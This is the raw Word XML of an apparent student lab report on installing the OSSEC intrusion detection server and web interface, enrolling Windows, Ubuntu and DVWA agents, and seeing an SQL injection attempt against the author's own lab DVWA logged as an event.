          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>* &amp;&amp; rm /etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>ossec-init.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4D987569" w14:textId="4A250C4E" w:rsidR="003464A1" w:rsidRDefault="003464A1" w:rsidP="003464A1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A55D70B" w14:textId="6A0EF83F" w:rsidR="003464A1" w:rsidRDefault="003464A1" w:rsidP="003464A1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This time, I will follow this guide to install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ossec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7617A6DB" w14:textId="77777777" w:rsidR="002C7ADD" w:rsidRDefault="002C7ADD" w:rsidP="003464A1">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C7ADD">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t xml:space="preserve">https://hendgrow.com/2020/10/01/ossec-open-source-hids-with-web-user-interface-updated-for-ubuntu-20-04-ossec-3-6-0/ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233E2E05" w14:textId="68E21B24" w:rsidR="002C7ADD" w:rsidRDefault="002C7ADD" w:rsidP="003464A1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">I just changed the version number since there is a newer version for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ossec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> than 3.6.0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453821EC" w14:textId="5045039F" w:rsidR="002C7ADD" w:rsidRDefault="002C7ADD" w:rsidP="003464A1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">I installed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ossec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the server with the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>comman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Then, I unzipped it then I installed it like before. I made sure to choose server installation. On the other hand, I chose agent installation for ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00BA796E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. I added the Ubuntu agent to the server through this command: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A8D670" w14:textId="2BAFD601" w:rsidR="00BA796E" w:rsidRDefault="00BA796E" w:rsidP="003464A1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA796E">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BA796E">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> /var/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA796E">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ossec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BA796E">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA796E">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>manage_agents</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="13B1A6AE" w14:textId="6B70236E" w:rsidR="00BA796E" w:rsidRDefault="00BA796E" w:rsidP="003464A1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">I added the client, and I got a unique key for Ubuntu client. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0946B5" w14:textId="2A8021DF" w:rsidR="00BA796E" w:rsidRDefault="00BA796E" w:rsidP="003464A1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>With the same command but on Ubuntu, I got this dashboard:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A0217C" w14:textId="4B31E191" w:rsidR="00BA796E" w:rsidRDefault="00BA796E" w:rsidP="003464A1">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61B027B4" wp14:editId="467F846E">
            <wp:extent cx="5725160" cy="3562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53A7465A" w14:textId="5342B9E5" w:rsidR="00BA796E" w:rsidRDefault="00BA796E" w:rsidP="00BA796E">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41E25FCE" w14:textId="437BE8F9" w:rsidR="00BA796E" w:rsidRDefault="00BA796E" w:rsidP="00BA796E">
      <w:r>
        <w:t xml:space="preserve">I did import the key for the client and the client got added to the server. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A56A5C" w14:textId="0CF42D4B" w:rsidR="00BA796E" w:rsidRDefault="00BA796E" w:rsidP="00BA796E">
      <w:r>
        <w:t xml:space="preserve">However, </w:t>
      </w:r>
      <w:r w:rsidR="005A3B83">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">fter doing all the steps I still have the same problem which is </w:t>
      </w:r>
      <w:r w:rsidR="005A3B83">
        <w:t xml:space="preserve">empty </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005A3B83">
        <w:t>ossec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005A3B83">
        <w:t xml:space="preserve"> dashboard. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B580B7" w14:textId="789521AA" w:rsidR="005A3B83" w:rsidRDefault="005A3B83" w:rsidP="00BA796E">
      <w:r>
        <w:t xml:space="preserve">I am starting to think that the problem is on the server. Therefore, I will redo the steps but on a new server. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB9C3BC" w14:textId="0F380B8E" w:rsidR="005A3B83" w:rsidRDefault="005A3B83" w:rsidP="005A3B83">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Try 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741FF0C5" w14:textId="5B862522" w:rsidR="005A3B83" w:rsidRDefault="00ED5786" w:rsidP="005A3B83">
      <w:r>
        <w:t xml:space="preserve">I launched a new server and installed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ossec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> with server installation on it. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9DB8DE" w14:textId="59BADC6D" w:rsidR="00ED5786" w:rsidRDefault="00ED5786" w:rsidP="005A3B83">
      <w:r>
        <w:t xml:space="preserve">I did the same exact steps as before and it worked this time. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ossec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> dashboard is no longer empty.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A73822" w14:textId="32F3C82F" w:rsidR="00ED5786" w:rsidRDefault="00ED5786" w:rsidP="005A3B83">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53B4655A" wp14:editId="48E7EAED">
            <wp:extent cx="5732780" cy="21069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4D537A41" w14:textId="1685FEE2" w:rsidR="00ED5786" w:rsidRDefault="00ED5786" w:rsidP="00ED5786"/>
    <w:p w14:paraId="2D8FF3D4" w14:textId="267D29AE" w:rsidR="00ED5786" w:rsidRDefault="00ED5786" w:rsidP="00ED5786">
      <w:r>
        <w:t>The problem was with the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB4C012" w14:textId="0A6F74BB" w:rsidR="00ED5786" w:rsidRDefault="00ED5786" w:rsidP="00ED5786">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Now let us add some agents:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DDD5B0" w14:textId="51E98685" w:rsidR="00ED5786" w:rsidRDefault="00ED5786" w:rsidP="00ED5786">
      <w:r>
        <w:t>I installed OSSEC agent for windows through this link:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DA8478" w14:textId="235BC0B2" w:rsidR="00ED5786" w:rsidRDefault="00000000" w:rsidP="00ED5786">
      <w:hyperlink r:id="rId29" w:history="1">
        <w:r w:rsidR="00ED5786" w:rsidRPr="002354C9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://updates.atomicorp.com/channels/atomic/windows/ossec-agent-win32-3.6.0-12032.exe</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="513181FC" w14:textId="05283921" w:rsidR="0037767F" w:rsidRDefault="0037767F" w:rsidP="0037767F">
      <w:r>
        <w:t>I opened it as administrator, and this is the user interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31041862" w14:textId="11183865" w:rsidR="0037767F" w:rsidRPr="00ED5786" w:rsidRDefault="0037767F" w:rsidP="0037767F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="276E90BD" wp14:editId="136126BF">
            <wp:extent cx="5725160" cy="4627880"/>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14:paraId="6C451483" w14:textId="194F3E8B" w:rsidR="005A3B83" w:rsidRDefault="0037767F" w:rsidP="0037767F">
      <w:r>
        <w:t>There are 2 inputs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101F1864" w14:textId="0A12CD89" w:rsidR="0037767F" w:rsidRDefault="0037767F" w:rsidP="0037767F">
      <w:r>
        <w:t xml:space="preserve">One for the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> address of the server which was: 192.168.234.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E63BB71" w14:textId="74CAE72B" w:rsidR="0037767F" w:rsidRDefault="0037767F" w:rsidP="0037767F">
      <w:r>
        <w:t>And input for authentication key for the windows client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27135E53" w14:textId="0015CE86" w:rsidR="0037767F" w:rsidRDefault="0037767F" w:rsidP="0037767F">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25391F8B" wp14:editId="591DD0DE">
            <wp:extent cx="5732780" cy="27990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799080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA09AA2" w14:textId="35A14F68" w:rsidR="0037767F" w:rsidRDefault="0037767F" w:rsidP="0037767F">
      <w:r>
        <w:t>This is the key for the windows client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08701A9B" w14:textId="3BBD11FC" w:rsidR="0037767F" w:rsidRDefault="0037767F" w:rsidP="0037767F">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67F48706" wp14:editId="18703779">
            <wp:extent cx="5725160" cy="310070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F67CCC8" w14:textId="2C280580" w:rsidR="0037767F" w:rsidRPr="0037767F" w:rsidRDefault="0037767F" w:rsidP="0037767F"/>
    <w:p w14:paraId="60794A54" w14:textId="6E04ECAF" w:rsidR="0037767F" w:rsidRDefault="0037767F" w:rsidP="0037767F">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>I am using the server terminal on the cmd to be able to copy the key as on the server I would not be able to copy, I used this command to connect to the server terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF8F600" w14:textId="6BE886EC" w:rsidR="0037767F" w:rsidRDefault="0037767F" w:rsidP="0037767F">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037767F">
        <w:rPr>
          <w:noProof/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh </w:t>
      </w:r>
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r w:rsidRPr="002354C9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
            <w:highlight w:val="lightGray"/>
          </w:rPr>
          <w:t>student@192.168.234.2</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="528CF768" w14:textId="04FC2B60" w:rsidR="0037767F" w:rsidRDefault="0037767F" w:rsidP="0037767F">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5918A624" w14:textId="21AA899F" w:rsidR="0037767F" w:rsidRDefault="0037767F" w:rsidP="0037767F">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="266E6ABC" w14:textId="77777777" w:rsidR="0037767F" w:rsidRDefault="0037767F" w:rsidP="0037767F">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37C7D989" w14:textId="04006A30" w:rsidR="0037767F" w:rsidRDefault="0037767F" w:rsidP="0037767F">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Now that I added the client, let us take a look at the OSSEC-wui</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF65A07" w14:textId="634A28C6" w:rsidR="0037767F" w:rsidRDefault="0037767F" w:rsidP="0037767F"/>
    <w:p w14:paraId="2F0B1304" w14:textId="45D745B0" w:rsidR="0037767F" w:rsidRDefault="0037767F" w:rsidP="0037767F">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5283E19C" wp14:editId="5ED67C04">
            <wp:extent cx="5725160" cy="32200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E99545D" w14:textId="0B46756A" w:rsidR="0037767F" w:rsidRDefault="0037767F" w:rsidP="0037767F">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29132047" w14:textId="0925ADAF" w:rsidR="0037767F" w:rsidRDefault="0037767F" w:rsidP="0037767F">
      <w:r>
        <w:t>As you can see the dashboard is now full of information about the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0584D93C" w14:textId="716797EA" w:rsidR="0037767F" w:rsidRDefault="0037767F" w:rsidP="0037767F">
      <w:r>
        <w:t>I only added one client which is my windows PC, let me add another client which is the Ubuntu desktop as well.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3BEFF5" w14:textId="724ECC2D" w:rsidR="0037767F" w:rsidRDefault="008359B7" w:rsidP="0037767F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C3CD206" wp14:editId="04A3F905">
            <wp:extent cx="5725160" cy="1725295"/>
            <wp:effectExtent l="0" t="0" r="889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725295"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FBC844" w14:textId="24A0055C" w:rsidR="008359B7" w:rsidRDefault="008359B7" w:rsidP="008359B7">
      <w:r>
        <w:t>First ssh to add the client and copy the key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FA601B" w14:textId="5DD92C55" w:rsidR="008359B7" w:rsidRDefault="008359B7" w:rsidP="008359B7">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2571E024" wp14:editId="0C8C0CAB">
            <wp:extent cx="5732780" cy="22739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r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AB7229D" wp14:editId="75E6B218">
            <wp:extent cx="5780405"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1566545"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F869DE1" w14:textId="1F836747" w:rsidR="008359B7" w:rsidRPr="008359B7" w:rsidRDefault="008359B7" w:rsidP="008359B7"/>
    <w:p w14:paraId="0F1DE2F1" w14:textId="0897EA5B" w:rsidR="008359B7" w:rsidRDefault="008359B7" w:rsidP="008359B7">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47065E61" w14:textId="312BD012" w:rsidR="008359B7" w:rsidRDefault="008359B7" w:rsidP="008359B7">
      <w:r>
        <w:t>Now restart the server with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DA0CCA" w14:textId="37B6F05A" w:rsidR="008359B7" w:rsidRPr="008359B7" w:rsidRDefault="008359B7" w:rsidP="008359B7">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008359B7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008359B7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008359B7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>systemctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008359B7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> restart apache2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002F8C02" w14:textId="3C120673" w:rsidR="008359B7" w:rsidRDefault="008359B7" w:rsidP="008359B7">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008359B7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008359B7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> /var/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008359B7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ossec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008359B7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008359B7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ossec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008359B7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>-control restart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8E3C20" w14:textId="51E822A0" w:rsidR="008359B7" w:rsidRDefault="008359B7" w:rsidP="008359B7">
      <w:r>
        <w:t>Finally, let us look at the web interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1804947E" w14:textId="15677149" w:rsidR="008359B7" w:rsidRPr="008359B7" w:rsidRDefault="008359B7" w:rsidP="008359B7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B9CDE52" wp14:editId="2F2E11A3">
            <wp:extent cx="5725160" cy="314071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7CFF7829" w14:textId="104B4FA9" w:rsidR="0032352E" w:rsidRDefault="0032352E" w:rsidP="0032352E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">I want to add another client which is the server that I use for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343BB3BA" w14:textId="3707EFA7" w:rsidR="0032352E" w:rsidRDefault="0032352E" w:rsidP="0032352E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">With the same previous steps, I added the server as a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>clients</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and got added to the dashboard as you can see:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4681ACC3" w14:textId="15A51B5E" w:rsidR="0032352E" w:rsidRDefault="0032352E" w:rsidP="0032352E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C28527D" wp14:editId="02DA10B7">
            <wp:extent cx="5725160" cy="21628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A179505" w14:textId="75BCDC04" w:rsidR="0032352E" w:rsidRDefault="0032352E" w:rsidP="0032352E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69516F2D" w14:textId="12A431FA" w:rsidR="0032352E" w:rsidRDefault="0032352E" w:rsidP="0032352E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Now I can see all the events that happen to the server. For instance, I tried to do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> injection on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> log in and got this event:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401E065B" w14:textId="3C685B40" w:rsidR="0032352E" w:rsidRDefault="0032352E" w:rsidP="0032352E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B13E0E9" wp14:editId="034F50B6">
            <wp:extent cx="5732780" cy="317246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14:paraId="0A817F0B" w14:textId="24F385D7" w:rsidR="0032352E" w:rsidRDefault="0032352E" w:rsidP="0032352E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
